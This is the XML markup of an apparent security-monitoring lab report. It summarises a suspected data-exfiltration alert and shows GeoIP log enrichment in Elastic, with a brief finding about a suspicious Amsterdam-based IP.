    <w:p w14:paraId="4830A95E" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DFDD12" w14:textId="2A0B14F8" w:rsidR="009F3B11" w:rsidRDefault="00F64E62" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8AB121" wp14:editId="3D59663B">
            <wp:extent cx="5705673" cy="3803782"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="1658399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045" cy="3818030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A1E50" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007CE407" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRDefault="009F3B11" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37620209" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>50-word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C7274" w14:textId="0AB0B024" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">A sudden outbound data transfer exceeding 1MB was detected from host 192.168.1.150 to 203.0.113.50. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> is abnormal for this system and indicates potential data exfiltration. Further investigation is required to confirm if credentials or sensitive files were accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686569F" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D000872" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12265D72" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D1C57D" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9AEB57" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1F8F2F" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDE71B9" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175DB3E5" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D601ED" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03008F05" w14:textId="7214868F" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Log Enrichment (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plugin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F904ED" w14:textId="77777777" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477B70B5" w14:textId="4086084B" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516238A" w14:textId="43531864" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B067FF7" w14:textId="428A7A74" w:rsidR="009F3B11" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>geoipupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71CD1296" w14:textId="44E70BC0" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:hanging="578"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Enable enrichment pipeline in Elastic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680945F3" w14:textId="552AE260" w:rsidR="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PUT _ingest/pipeline/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>geoip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A37FD1D" w14:textId="3B6201EB" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">   3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Logs now show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5F084" w14:textId="77777777" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618CD86" w14:textId="77777777" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>City</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509151CA" w14:textId="77777777" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Latitude</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB907D" w14:textId="77777777" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Reputation (If TI connected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415B2ED" w14:textId="5AE31102" w:rsidR="00834729" w:rsidRPr="00834729" w:rsidRDefault="00834729" w:rsidP="00834729">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D9737D" w14:textId="70FEBC13" w:rsidR="009F3B11" w:rsidRDefault="00465B61" w:rsidP="009F3B11">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778208C7" wp14:editId="5297BF71">
            <wp:extent cx="4991797" cy="3686689"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15307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381" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4991797" cy="3686689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF1404" w14:textId="4B2120FA" w:rsidR="00465B61" w:rsidRPr="00465B61" w:rsidRDefault="00465B61" w:rsidP="00465B61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>50-Word Finding</w:t>
      </w:r>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B84D3" w14:textId="77777777" w:rsidR="00465B61" w:rsidRDefault="00465B61" w:rsidP="00465B61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442089E3" w14:textId="16C2A9B4" w:rsidR="00465B61" w:rsidRPr="00465B61" w:rsidRDefault="00465B61" w:rsidP="00465B61">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Elastic’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin, the suspicious IP 185.234.219.55 was enriched with city, country, and ASN details. The lookup identified Amsterdam, Netherlands, with ASN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MivoCloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B61">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, known for scanning activity. This foreign-origin traffic was abnormal for the environment, supporting escalation as a potential reconnaissance or brute-force attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54336D3C" w14:textId="77777777" w:rsidR="009F3B11" w:rsidRPr="00594000" w:rsidRDefault="009F3B11" w:rsidP="00834729">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009F3B11" w:rsidRPr="00594000" w:rsidSect="00006D15">
      <w:headerReference w:type="even" r:id="rId13"/>
      <w:headerReference w:type="default" r:id="rId14"/>
      <w:footerReference w:type="even" r:id="rId15"/>
      <w:footerReference w:type="default" r:id="rId16"/>
      <w:headerReference w:type="first" r:id="rId17"/>
      <w:footerReference w:type="first" r:id="rId18"/>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E195F" w14:textId="77777777" w:rsidR="00DD7D1A" w:rsidRDefault="00DD7D1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="351151D7" w14:textId="77777777" w:rsidR="00DD7D1A" w:rsidRDefault="00DD7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DCF1" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D1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CFD2A74" wp14:editId="4752A4CB">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49B98902" id="Group 6366" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:799.55pt;width:451.55pt;height:1.7pt;z-index:251658240;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0E35CECA" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D1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D4F0" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D1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3CFD3EF5" wp14:editId="5A652348">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180FA346" id="Group 6338" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:799.55pt;width:451.55pt;height:1.7pt;z-index:251657216;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445DE92F" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D1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8756" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D15">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2EE61182" wp14:editId="4B3A636B">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523B26E3" id="Group 6310" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:799.55pt;width:451.55pt;height:1.7pt;z-index:251656192;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733AAD41" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D15">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FB1E" w14:textId="77777777" w:rsidR="00DD7D1A" w:rsidRDefault="00DD7D1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63BB4E5E" w14:textId="77777777" w:rsidR="00DD7D1A" w:rsidRDefault="00DD7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EA48" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D15">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="594758A9" wp14:editId="2121368B">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4299" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D15">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="5B3A349C" wp14:editId="63012EEB">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58AB" w14:textId="77777777" w:rsidR="00006D15" w:rsidRDefault="00006D15">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="2B836F8E" wp14:editId="6C5B642A">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3FAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="878C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2391E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3868B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2B3E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2010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97B72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48B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A5FDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="260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500D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B18B3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3A65F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AA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5033E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D2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C01F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F986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0F4760"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1CC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AE6972"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BCA3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E214B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D00C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4B4AD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D50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E35EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C16024DC"/>
    <w:lvl w:ilvl="0" w:tplc="7646CBE6">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3B0B0CE">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4CA8F98">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34AE541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A60A58">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45ACC52">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0C743A30">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B50A156">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4402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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7DA85862"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0982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B46112"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87E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186559">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="758915185">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="419376109">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="364260392">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="560364846">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1340934685">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1452822614">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="951592412">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1494950718">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="218634104">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1403017374">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="774595268">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1103694306">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="386221719">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="626132067">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="914896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15"/>
    <w:rsid w:val="00002323"/>
    <w:rsid w:val="00006D15"/>
    <w:rsid w:val="00043BF2"/>
    <w:rsid w:val="00046414"/>
    <w:rsid w:val="002528A3"/>
    <w:rsid w:val="003351F5"/>
    <w:rsid w:val="00452F44"/>
    <w:rsid w:val="00465B61"/>
    <w:rsid w:val="00484DAC"/>
    <w:rsid w:val="00594000"/>
    <w:rsid w:val="007871B3"/>
    <w:rsid w:val="00834729"/>
    <w:rsid w:val="008575DA"/>
    <w:rsid w:val="009F3B11"/>
    <w:rsid w:val="00A83265"/>
    <w:rsid w:val="00B4010A"/>
    <w:rsid w:val="00DD7D1A"/>
    <w:rsid w:val="00E7775B"/>
    <w:rsid w:val="00F64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7BC7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B96A779-D5F9-44B9-A515-0862BB91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D15"/>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006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6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15"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00006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D15"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
